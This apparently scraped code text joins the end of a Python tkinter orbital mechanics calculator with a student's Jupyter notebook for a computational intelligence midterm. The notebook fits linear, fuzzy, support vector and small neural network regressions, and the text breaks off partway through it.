print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (planet_normrad == 6):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle,)) + ' m/s')
elif (planet_normrad == 7):
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
else:
print(str(NormRad_TwoVel(velocity_initial, velocity_final, angle)) + ' m/s')
elif (choice == 4):
print('1. Mercury')
print('2. Venus')
print('3. Earth')
print('4. Mars')
print('5. Jupiter')
print('6. Saturn')
print('7. Uranus')
print('8. Neptune')
print('9. Custom planet')
planet_info = int(input('Which planets information would you like?'))
if (planet_info == 1):
print(Planet_info(Mercury))
elif(planet_info == 2):
print(Planet_info(Venus))
elif(planet_info == 3):
print(Planet_info(Earth))
elif(planet_info == 4):
print(Planet_info(Mars))
elif(planet_info == 5):
print(Planet_info(Jupiter))
elif(planet_info == 6):
print(Planet_info(Saturn))
elif(planet_info == 7):
print(Planet_info(Uranus))
elif(planet_info == 8):
print(Planet_info(Neptune))
elif(planet_info == 9):
try:
print(Planet_info(custom_planet))
except NameError:
print('Custom planet data not found, please create a custom planet and then try again')
else:
print('Incorrect option. Please try again')
elif (choice == 5):
name = print(str(input('What is the name of your custom planet? ')))
semi_major = float(input('What is ' + str(name) + 's semi-major axis? [m] '))
mass = float(input('What is the mass of ' + str(name) + '? [kg]'))
eccen = float(input('What is ' + str(name) + 's eccentricity? [Dimensionless] '))
period = float(input('What is ' + str(name) + 's orbital period? [s] '))
rad = float(input('What is the radius of ' + str(name) + '[m]'))
custom_planet = Planet(semi_major, mass, eccen, period, rad)
print(Planet_info(custom_planet))
elif (choice == 6):
exit()
else:
print('Incorrect choice, please select a valid number')
```
root = tk.Tk()
#root = tk.Toplevel()
root.state('zoomed')
root.iconbitmap('rocket_icon.ico')
root.title('Orbital Mechanics Calculator')
HEIGHT = 700
WIDTH = 1000
canvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)
canvas.pack()
#background_image = tk.PhotoImage(file='cosmos-5809271_1920.png')
background_image = tk.PhotoImage(file='rocket_background_collaged.png')
background_label = tk.Label(root, image=background_image)
background_label.place(relwidth=1, relheight=1)
frame = tk.Frame(root, bg='#00688B', bd=5)
#frame = tk.Frame(root, bg='#80c1ff', bd=5)
frame.place(relx=0.5, rely=0.1, relwidth=0.75, relheight=0.3, anchor='n')
tk.Label(frame, text = "r1:").place(relwidth=0.03, relheight=0.15)
tk.Label(frame, text = "r2:").place(relx=0.21, relwidth=0.03, relheight=0.15)
tk.Label(frame, text = "Planet:").place(relx=0.41, relwidth=0.03, relheight=0.15)
tk.Label(frame, text = "velocity:").place(relwidth=0.03, relheight=0.15, rely=0.25)
tk.Label(frame, text = "theta:").place(relx=0.21, relwidth=0.03, relheight=0.15, rely=0.25)
entry_r1_1 = tk.Entry(frame, font=40, text='r1')
entry_r1_1.place(relwidth=0.15, relx=0.05, rely=0, relheight=0.15)
entry_r2_1 = tk.Entry(frame, font=40, text='r2')
entry_r2_1.place(relwidth=0.15, relx=0.25, rely=0, relheight=0.15)
entry_planet_1 = tk.Entry(frame, font=40, text='Planet')
entry_planet_1.place(relwidth=0.15, relx=0.45, rely=0, relheight=0.15)
entry_vi = tk.Entry(frame, font=40, text='initial velocity')
entry_vi.place(relwidth=0.15, relx=0.05, rely=0.25, relheight=0.15)
entry_theta_1 = tk.Entry(frame, font=40)
entry_theta_1.place(relwidth=0.15, rely=0.25, relx =0.25, relheight=0.15)
entry_vi_2 = tk.Entry(frame, font=40)
entry_vi_2.place(relwidth=0.15, rely=0.5, relx=0.05, relheight=0.15)
entry_vf = tk.Entry(frame, font=40)
entry_vf.place(relwidth=0.15, rely=0.5, relx=0.25, relheight=0.15)
entry_theta = tk.Entry(frame, font=40)
entry_theta.place(relwidth=0.15, rely=0.5, relx =0.45, relheight=0.15)
#entry_
#button_hohmann_1 = tk.Button(frame, text="Hohmann Transfer Delta-V", font=40, command=lambda: deltaV_1(float(entry_r1_1.get()), float(entry_r2_1.get()),Earth))
button_hohmann_1 = tk.Button(frame, text="Hohmann Transfer Delta-V", font=40, command=lambda: deltaV_1(float(entry_r1_1.get()), float(entry_r2_1.get()),entry_planet_1.get()))
button_hohmann_1.place(relx=0.7, rely=0, relheight=0.15, relwidth=0.3)
button_normrad = tk.Button(frame, text="Normal/Radial Delta-V", font=40, command=lambda: NormRad(float(entry_vi.get()), float(entry_theta_1.get())))
button_normrad.place(relx=0.7, rely=0.25, relheight=0.15, relwidth=0.3)
button_normrad_diffV = tk.Button(frame, text="Normal/Radial Delta-V (Different velocities)", font=40, command=lambda: NormRad_TwoVel(float(entry_vi_2.get()),float(entry_vf.get()),float(entry_theta.get())))
button_normrad_diffV.place(relx=0.7, rely=0.5, relheight=0.15, relwidth=0.3)
lower_frame = tk.Frame(root, bg='#00688B', bd=10)
lower_frame.place(relx=0.5, rely=0.65, relwidth=0.25, relheight=0.2, anchor='n')
label = tk.Label(lower_frame)
label.place(relwidth=1, relheight=1)
root.mainloop()
```
|
github_jupyter
|
<h1>CI Midterm<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#Q1-Simple-Linear-Regression" data-toc-modified-id="Q1-Simple-Linear-Regression-1">Q1 Simple Linear Regression</a></span></li><li><span><a href="#Q2-Fuzzy-Linear-Regression" data-toc-modified-id="Q2-Fuzzy-Linear-Regression-2">Q2 Fuzzy Linear Regression</a></span></li><li><span><a href="#Q3-Support-Vector-Regression" data-toc-modified-id="Q3-Support-Vector-Regression-3">Q3 Support Vector Regression</a></span></li><li><span><a href="#Q4-Single-layer-NN" data-toc-modified-id="Q4-Single-layer-NN-4">Q4 Single-layer NN</a></span><ul class="toc-item"><li><span><a href="#First-two-iterations-illustration" data-toc-modified-id="First-two-iterations-illustration-4.1">First two iterations illustration</a></span></li><li><span><a href="#Code" data-toc-modified-id="Code-4.2">Code</a></span></li></ul></li><li><span><a href="#Q5-Two-layer-NN" data-toc-modified-id="Q5-Two-layer-NN-5">Q5 Two-layer NN</a></span><ul class="toc-item"><li><span><a href="#First-two-iterations-illustration" data-toc-modified-id="First-two-iterations-illustration-5.1">First two iterations illustration</a></span></li><li><span><a href="#Code" data-toc-modified-id="Code-5.2">Code</a></span></li></ul></li><li><span><a href="#Q6-Re-do-Q1-Q5" data-toc-modified-id="Q6-Re-do-Q1-Q5-6">Q6 Re-do Q1-Q5</a></span><ul class="toc-item"><li><span><a href="#Simple-Linear-Regression" data-toc-modified-id="Simple-Linear-Regression-6.1">Simple Linear Regression</a></span></li><li><span><a href="#Fuzzy-Linear-Regression" data-toc-modified-id="Fuzzy-Linear-Regression-6.2">Fuzzy Linear Regression</a></span></li><li><span><a href="#Support-Vector-Regression" data-toc-modified-id="Support-Vector-Regression-6.3">Support Vector Regression</a></span></li><li><span><a href="#Single-layer-NN" data-toc-modified-id="Single-layer-NN-6.4">Single-layer NN</a></span><ul class="toc-item"><li><span><a href="#First-two-iterations-illustration" data-toc-modified-id="First-two-iterations-illustration-6.4.1">First two iterations illustration</a></span></li><li><span><a href="#Code" data-toc-modified-id="Code-6.4.2">Code</a></span></li></ul></li><li><span><a href="#Two-layer-NN" data-toc-modified-id="Two-layer-NN-6.5">Two-layer NN</a></span><ul class="toc-item"><li><span><a href="#First-two-iterations-illustration" data-toc-modified-id="First-two-iterations-illustration-6.5.1">First two iterations illustration</a></span></li><li><span><a href="#Code" data-toc-modified-id="Code-6.5.2">Code</a></span></li></ul></li></ul></li><li><span><a href="#Q7-Discussion" data-toc-modified-id="Q7-Discussion-7">Q7 Discussion</a></span><ul class="toc-item"><li><span><a href="#Discussion-of-Convergence-Issue" data-toc-modified-id="Discussion-of-Convergence-Issue-7.1">Discussion of Convergence Issue</a></span></li></ul></li><li><span><a href="#Q8-Bonus-Question" data-toc-modified-id="Q8-Bonus-Question-8">Q8 Bonus Question</a></span><ul class="toc-item"><li><span><a href="#Simple-Linear-Regression" data-toc-modified-id="Simple-Linear-Regression-8.1">Simple Linear Regression</a></span></li><li><span><a href="#Fuzzy-Linear-Regression" data-toc-modified-id="Fuzzy-Linear-Regression-8.2">Fuzzy Linear Regression</a></span></li><li><span><a href="#Support-Vector-Regression" data-toc-modified-id="Support-Vector-Regression-8.3">Support Vector Regression</a></span></li><li><span><a href="#Single-layer-NN" data-toc-modified-id="Single-layer-NN-8.4">Single-layer NN</a></span></li></ul></li></ul></div>
## Q1 Simple Linear Regression
First, the training data has been visualized as below.
```
%matplotlib inline
import numpy as np
import pandas as pd
import cvxpy as cp
import matplotlib.pyplot as plt
ar = np.array([[1, 1, 1, 1, 1, 1], # intercept
[1, 2, 3, 4, 5, 6], # x
[1, 2, 3, 4, 5, 6]]) # y
# plot the dot points
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.title('Visualization of training observations')
plt.axis('scaled')
plt.show()
```
The data has been processed and the optimization problem (least sum of square) has been formulated. The estimate of $a$ (the slope) is very close to 1 and $b$ (intercept) is very close to 0. The fitted line has been plotted above the training set as well.
```
# Data preprocessing
X_lp = ar[[0, 1], :].T # transpose the array before modeling
y_lp = ar[2].T
# Define and solve the CVXPY problem.
beta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total
cost = cp.sum_squares(X_lp * beta - y_lp) # define cost function
obj = cp.Minimize(cost) # define objective function
prob = cp.Problem(obj)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe estimated of a (slope) is:", beta.value[1],
"\nThe estimate of b (intercept) is:", beta.value[0])
x = np.linspace(0, 10, 100)
y = beta.value[1] * x + beta.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = ax + b')
plt.title('Fitted line using simple LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
## Q2 Fuzzy Linear Regression
Same as HW2, the optimization problem has been formulated as below. Here I pick the threshold $\alpha$ as $0.5$ for spread calculation. Similar to Q1, The estimate of $A_1$ (the slope) is 1 and $A_0$ (intercept) is 0. The spread of $A_1$ and $A_0$ have both been calculated. As expected, both spreads are 0 since the regression line fits perfectly to the training data and there is no need of spreads to cover any errors between the estimate $\hat{y}$ and the true values $y$.
The fitted line has been plotted above the training set as well.
```
# Define threshold h (it has same meaning as the alpha in alpha-cut). Higher the h, wider the spread.
h = 0.5
# Define and solve the CVXPY problem.
c = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1
alpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1
cost = cp.sum(X_lp * c) # define cost function
obj = cp.Minimize(cost) # define objective function
constraints = [c >= 0,
y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp
-y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe center of A1 (slope) is:", alpha.value[1],
"\nThe spread of A1 (slope) is:", c.value[1],
"\nThe center of A0 (intercept) is:", alpha.value[0],
"\nThe spread of A0 (intercept) is:", c.value[0])
x = np.linspace(0, 10, 100)
y = alpha.value[1] * x + alpha.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = A1x + A0')
plt.title('Fitted line using Fuzzy LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
## Q3 Support Vector Regression
In the course lecture, it was mentioned that the objective function of SVR is to ***minimize the sum of squares plus seek for flatness of the hyperplane.*** In $\epsilon$-SV regression, our goal is to find a function $f(x)$ that has at most $\epsilon$ deviation from the actually obtained targets $y_i$ for all the training data, and at the same time is as flat as possible. Flatness in the case means that one seeks a small $w$ and the approach here is to minimize the L2-norm. The problem can be written as a convex optimization problem:

Sometimes the convex optimization problem does not render feasible solution. We also may want to allow for some errors. Similarly to the loss function of “soft margin” in SVM, we introduce slack variables $ξ_i$, $ξ_i^*$ to cope with otherwise infeasible constraints of the optimization problem:

Here the constent $C$ should be $>0$ and determines the trade-off between the flatness of $f(x)$ and the amount up to which deviations larger than $\epsilon$ are tolerated. The optimization problem is formulated with slack variables and in the program below, I defined $C$ as $\frac{1}{N}$ where $N=6$ is the # of observations in the training set. The $\epsilon$ here has been set to 0.
From the output below, the estimated $w$ is very close to 1 and $b$ is very close to 0.
```
# The constant C, defines the trade-off between the flatness of f and the amount up to which deviations larger than ε are tolerated.
# When C gets bigger, the margin get softer. Here C is defined as 1/N. N is the # of observations.
C = 1 / len(ar[1])
epsilon = 0 # For this ε-SVR problem set ε=0
# Define and solve the CVXPY problem.
bw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w
epsilon1 = cp.Variable(X_lp.shape[0]) # for slack variables ξi
epsilon2 = cp.Variable(X_lp.shape[0]) # for slack variables ξ*i
cost = 1 / 2 * bw[1] ** 2 + C * cp.sum(epsilon1 + epsilon2) # define cost function
obj = cp.Minimize(cost) # define objective function
constraints = [epsilon1 >= 0,
epsilon2 >= 0,
y_lp <= X_lp * bw + epsilon + epsilon1,
-y_lp <= -(X_lp * bw) + epsilon + epsilon2]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe estimate of w is:", bw.value[1],
"\nThe estimate of b is:", bw.value[0], )
```
The fitted line has been plotted above the training set as well:
```
x = np.linspace(0, 10, 100)
y = bw.value[1] * x + bw.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = wx + b')
plt.title('Fitted line using SVR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
## Q4 Single-layer NN
### First two iterations illustration
From the NN archiecture on Lecture 7 page 13, the network output $a$ can be denoted as:
$$a=f(x)=f(wp+b)$$
where
$$x=wp+b\quad f(x)=5x\quad \frac{\partial f}{\partial x}=5$$
Since $b=1$,
$$a=f(x)=f(wp+b)=5(wp+1)$$
Set the loss function $E$ as:
$$ E=\sum_{i=1}^N \frac{1}{2}(T_i-a_i)^2 $$
where $T_i$ is the target value for each input $i$ and $N$ is the number of observations in the training set.
We can find the gradient for $w$ by:
$$\frac{\partial E}{\partial w}=\frac{\partial E}{\partial a}\frac{\partial a}{\partial x}\frac{\partial x}{\partial w}$$
**For the 1st iteration**, with initial value $w=10$:
$$
\frac{\partial E}{\partial a}=a-T=5(wp_i+1)-T_i\\
\frac{\partial f}{\partial x}=5$$
$$\frac{\partial x_1}{\partial w}=p_1=1$$
$$\vdots$$
$$\frac{\partial x_6}{\partial w}=p_6=6$$
For $i=1$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*1+1)-1=54\\
\frac{\partial E}{\partial w}=54*5*1$$
For $i=2$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-2=103\\
\frac{\partial E}{\partial w}=103*5*2$$
For $i=3$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-3=152\\
\frac{\partial E}{\partial w}=152*5*3$$
For $i=4$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*4+1)-4=201\\
\frac{\partial E}{\partial w}=201*5*4$$
For $i=5$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*5+1)-5=250\\
\frac{\partial E}{\partial w}=250*5*5$$
For $i=6$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*6+1)-6=299\\
\frac{\partial E}{\partial w}=299*5*6$$
The sum of gradient for the batch training is:
$$\sum_{i}(\frac{\partial E}{\partial w})=(54*1+103*2+152*3+201*4+250*5+299*6)*5=22820
$$
Average the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w})}{N}=380.333
$$.
The new $w$ and output $a$ is calculated:
$$w=10-380.333=-370.333\\
a=[-1846.667,-3698.333,-5550,-7401.667,-9253.333, -11105]
$$
**For the 2nd iteration:**
For $i=1$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*1+1)-1=-1847.667\\
\frac{\partial E}{\partial w}=-1847.667*5*1$$
For $i=2$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*2+1)-2=-3700.333\\
\frac{\partial E}{\partial w}=-3700.333*5*2$$
For $i=3$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*3+1)-3=-5553\\
\frac{\partial E}{\partial w}=-5553*5*3$$
For $i=4$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*4+1)-4=-7405.667\\
\frac{\partial E}{\partial w}=-7405.667*5*4$$
For $i=5$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*5+1)-5=-9258.333\\
\frac{\partial E}{\partial w}=-9258.333*5*5$$
For $i=6$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(-370.333*6+1)-6=-11111\\
\frac{\partial E}{\partial w}=-11111*5*6$$
The sum of gradient for the batch training is:
$$\sum_{i}(\frac{\partial E}{\partial w})=(-1847.667*1+-3700.333*2+-5553*3+-7405.667*4+-9258.333*5+-11111*6)*5=-842438.333
$$
Average the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w})}{N}=-14040.639
$$.
The new $w$ and output $a$ is calculated:
$$w=-370.333-(-14040.638)=-13670.305\\
a=[68356.528, 136708.056, 205059.583, 273411.111, 341762.639, 410114.167]
$$
### Code
**We can tell from the above that throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge.** Further discussion has been made in Q7 to explore for a proper learning rate in this case.
From the code below, after 30 iterations the loss function value becomes larger and larger and won't be able to converge, which further proves the findings.
```
def single_layer_NN(lr, w, maxiteration):
"""lr - learning rate\n
w - initial value of w\n
maxiteration - define # of max iteration """
E0 = sum(0.5 * np.power((y_lp - 5 * (w * X_lp[:, 1] + 1)), 2)) # initialize Loss, before 1st iteration
for i in range(maxiteration):
if i > 0: # Starting 2nd iteration, E1 value give to E0
E0 = E1 # Loss before iteration
print("Iteration=", i, ",", "Loss value=", E0)
gradient = np.mean((5 * (w * X_lp[:, 1] + 1) - y_lp) * 5 * X_lp[:, 1]) # calculate gradient
step = gradient * lr # calculate step size
w = w - step # refresh the weight
E1 = sum(0.5 * np.power((5 * (w * X_lp[:, 1] + 1) - y_lp), 2)) # Loss after iteration
a = 5 * (w * X_lp[:, 1] + 1) # the refreshed output
if abs(E0 - E1) <= 0.0001:
print('Break out of the loop and end at Iteration=', i,
'\nThe value of loss is:', E1,
'\nThe value of w is:', w)
break
return w, a, gradient
w, a, gradient = single_layer_NN(lr=0.1, w=10, maxiteration=30)
```
## Q5 Two-layer NN
### First two iterations illustration

The above structure will be used to model Q5, with $b_1=b_2=1$ and initial values $w_1=w_2=1$. For $f_1$, the activation function is sigmoid activation function. Since the sample data implies linear relationship, for $f_2$, a linear activation function (specifically, an **identify activation function**) has been chosen. The loss function $E$ has been the same as Q4:
$$
E=\sum_{i=1}^N \frac{1}{2}(T_i-a_2)^2
$$
where $T_i$ is the target value for each input $i$ and $N$ is the number of observations in the training set.
The output $a_1$ and $a_2$ can be denoted as:
$$
a_1=f_1(w_1p+b) \quad a_2=f_2(w_2a_1+b)
$$
where
$$
f_1(x)=\frac{1}{1+e^{-x}} \quad \frac{\partial f_1}{\partial x}=f_1(1-f_1)\\
and \quad f_2(x)=x \quad \frac{\partial f_2}{\partial x}=1
$$
We can find the gradient for $w_1$ and $w_2$ by:
$$
\frac{\partial E}{\partial w_2}=\frac{\partial E}{\partial a_2}\frac{\partial a_2}{\partial n_2}\frac{\partial n_2}{\partial w_2}=(w_2a_1+b-T)*1*a_1=(w_2a_1+1-T)a_1
\\
\frac{\partial E}{\partial w_1}=\frac{\partial E}{\partial a_2}\frac{\partial a_2}{\partial a_1}\frac{\partial a_1}{\partial n_1}\frac{\partial n_1}{\partial w_1}=(w_2a_1+b-T)*w_2*a_1(1-a_1)*p\\=\frac{\partial E}{\partial w_2}*w_2*(1-a_1)*p
$$
where
$$
a_1=f_1(w_1p+b)=\frac{1}{1+e^{-(w_1p+1)}}
$$
**We can see that the gradient of $w_1$ can be calculated from the gradient of $w_2$ and the gradient of both weights ($w_1$ and $w_2$) only relate to the input and the initial values of the weights!**
**For the 1st iteration**,
$$
For\quad i=1, 2, 3, 4, 5, 6, \quad a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1\\
$$
For $i=1:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-1=10\\
\frac{\partial E}{\partial w_2}=10*1*1=10,\quad \frac{\partial E}{\partial w_1}=10*10*(1-1)*1=0
$$
For $i=2:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-2=9\\
\frac{\partial E}{\partial w_2}=9*1*1=9,\quad \frac{\partial E}{\partial w_1}=9*10*(1-1)*1=0
$$
For $i=3:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\
\frac{\partial E}{\partial w_2}=8*1*1=8,\quad \frac{\partial E}{\partial w_1}=8*10*(1-1)*1=0
$$
For $i=4:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\
\frac{\partial E}{\partial w_2}=7*1*1=7,\quad \frac{\partial E}{\partial w_1}=7*10*(1-1)*1=0
$$
For $i=5:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-5=6\\
\frac{\partial E}{\partial w_2}=6*1*1=6,\quad \frac{\partial E}{\partial w_1}=6*10*(1-1)*1=0
$$
For $i=6:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-6=5\\
\frac{\partial E}{\partial w_2}=5*1*1=5,\quad \frac{\partial E}{\partial w_1}=5*10*(1-1)*1=0
$$
The sum of gradient for the batch training is:
$$\sum_{i}(\frac{\partial E}{\partial w_1})=0$$
$$\sum_{i}(\frac{\partial E}{\partial w_2})=10+9+8+7+6+5=45$$
Average the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_1})}{N}=0$$
$$s_2=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_2})}{N}=0.75$$
The new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated. The value of $a_1$ and $a_2$ are both for all 6 observations.
$$
w_1=w_1-s_1=10-0=10,\\
w_2=w_2-s_2=10-0.75=9.25\\
a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1, \quad i\in [1,2,3,4,5,6]\\
a_2=w_2a_1+b=9.25*1+1=10.25
$$
**For the 2nd iteration**,
$$
For\quad i=1, 2, 3, 4, 5, 6, \quad a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1\\
$$
For $i=1:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-1=9.25\\
\frac{\partial E}{\partial w_2}=9.25*1*1=9.25,\quad \frac{\partial E}{\partial w_1}=9.25*9.25*(1-1)*1=0
$$
For $i=2:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-2=8.25\\
\frac{\partial E}{\partial w_2}=8.25*1*1=8.25,\quad \frac{\partial E}{\partial w_1}=8.25*9.25*(1-1)*1=0
$$
For $i=3:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-3=7.25\\
\frac{\partial E}{\partial w_2}=7.25*1*1=7.25,\quad \frac{\partial E}{\partial w_1}=7.25*9.25*(1-1)*1=0
$$
For $i=4:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-4=6.25\\
\frac{\partial E}{\partial w_2}=6.25*1*1=6.25,\quad \frac{\partial E}{\partial w_1}=6.25*9.25*(1-1)*1=0
$$
For $i=5:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-5=5.25\\
\frac{\partial E}{\partial w_2}=5.25*1*1=5.25,\quad \frac{\partial E}{\partial w_1}=5.25*9.25*(1-1)*1=0
$$
For $i=6:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-6=4.25\\
\frac{\partial E}{\partial w_2}=4.25*1*1=4.25,\quad \frac{\partial E}{\partial w_1}=4.25*9.25*(1-1)*1=0
$$
The sum of gradient for the batch training is:
$$\sum_{i}(\frac{\partial E}{\partial w_1})=0$$
$$\sum_{i}(\frac{\partial E}{\partial w_2})=9.25+8.25+7.25+6.25+5.25+4.25=40.5$$
Average the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_1})}{N}=0$$
$$s_2=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_2})}{N}=0.675$$
The new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated, The value of $a_1$ and $a_2$ are both for all 6 observations:
$$
w_1=w_1-s_1=10-0=10,\\
w_2=w_2-s_2=9.25-0.675=8.575\\
a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1, \quad i\in [1,2,3,4,5,6]\\
a_2=w_2a_1+b=8.575*1+1=9.575
$$
### Code
Below is the code to estimate all weights using batch training, with the stopping criteria as change in loss function less than 0.0001. We can tell the iteration stopped at Iteration 62 and $w_1=10$ while $w_2=2.511$. We can tell that the $w_1$ hardly changes throughout the iterations. I did not show the first 60 iteration results since it makes the report wordy.
```
def linear_activation_NN(C, lr, w1, w2, maxiteration):
# C - set the slope of the f2: f2(x)=Cx
# lr - learning rate
# w1 - initial value of w1
# w2 - initial value of w2
# maxiteration - define # of max iteration
a1 = 1 / (1 + np.exp(-(w1 * X_lp[:, 1] + 1))) # initialize output1 - a1
a2 = C * (w2 * a1 + 1) # initialize output2 - a2
E0 = sum(0.5 * np.power(y_lp - a2, 2)) # initialize Loss, before 1st iteration
for i in range(maxiteration):
if i > 0: # Starting 2nd iteration, E1 value will give to E0
E0 = E1 # Loss before iteration
# print("Iteration=", i, ",", "Loss value=", E0)
gradient_2 = np.mean((w2 * a1 + 1 - y_lp) * C * a1) # calculate gradient for w2
gradient_1 = np.mean(
(w2 * a1 + 1 - y_lp) * C * w2 * a1 * (1 - a1) * X_lp[:, 1]) # use BP to calculate gradient for w1
# gradient_1 = np.mean(gradient_2 * w2 * (1 - a1) * X_lp[:, 1])
step_1 = gradient_1 * lr # calculate step size
step_2 = gradient_2 * lr
w1 = w1 - step_1 # refresh w1
w2 = w2 - step_2 # refresh w2
a1 = 1 / (1 + np.exp(-(w1 * X_lp[:, 1] + 1))) # refresh a1
a2 = C * (w2 * a1 + 1) # refresh a2
E1 = sum(0.5 * np.power(y_lp - a2, 2)) # Loss after iteration
if abs(E0 - E1) <= 0.0001:
print('Break out of the loop and the iteration converge at Iteration=', i,
'\nThe value of loss is:', E1,
'\nThe value of w1 is:', w1,
'\nThe value of w2 is:', w2)
break
return w1, w2, a1, a2, gradient_1, gradient_2
w1, w2, a1, a2, gradient_1, gradient_2 = linear_activation_NN(C=1, lr=0.1, w1=10, w2=10, maxiteration=100)
```
Below gives a plot on how the NN model fit to the current sample data points.
```
# plot the fit
x = np.linspace(-4, 10, 100)
y = w2 * (1 / (1 + np.exp(-(w1 * x + 1)))) + 1
# plt.close('all')
plt.plot(x, y, c='red', label='y = f(w2 * a1 + b)')
plt.title('Fitted line using two-layer NN')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.xlim((-5, 8))
plt.ylim((-2, 8))
plt.xlabel('x')
plt.ylabel('y')
plt.show()
```
## Q6 Re-do Q1-Q5
Two additional observations, (2, 3) and (3, 4) are added and below is the scatterplot showing how the data sample looks like.
```
ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1], # intercept
[1, 2, 3, 4, 5, 6, 2, 3], # x
[1, 2, 3, 4, 5, 6, 3, 4]]) # y
# plot the dot points
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.title('Visualization of training observations')
plt.axis('scaled')
plt.show()
```
### Simple Linear Regression
The simple linear regression fit similar to Q1 has been conducted as below. The estimated $slope=0.923$ and estimated $intercept=0.5$.
```
# Data preprocessing
X_lp = ar[[0, 1], :].T # transpose the array before modeling
y_lp = ar[2].T
# Define and solve the CVXPY problem.
beta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total
cost = cp.sum_squares(X_lp * beta - y_lp) # define cost function
obj = cp.Minimize(cost) # define objective function
prob = cp.Problem(obj)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe estimated of a (slope) is:", beta.value[1],
"\nThe estimate of b (intercept) is:", beta.value[0])
```
The regression line has been plotted:
```
# Plot the fit
